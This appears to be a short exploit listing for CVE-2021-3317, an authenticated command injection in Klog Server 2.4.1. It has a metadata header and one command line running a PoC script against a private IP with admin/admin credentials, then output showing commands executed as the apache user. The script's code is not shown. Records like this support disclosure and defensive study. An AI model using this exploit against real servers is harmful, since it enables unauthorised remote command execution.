Exploit Title: Klog Server 2.4.1 - Command Injection (Authenticated)
Date: 26.01.2021
Exploit Author: Metin Yunus Kandemir
Vendor Homepage: https://www.klogserver.com/
Version: 2.4.1
Description: https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection
CVE: 2021-3317
python3 PoC.py --target 10.10.56.51 --username admin --password admin --command id
[*] Status Code for login request: 302
[+] Authentication was successful!
[*] Exploiting...
uid=48(apache) gid=48(apache) groups=48(apache)
https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection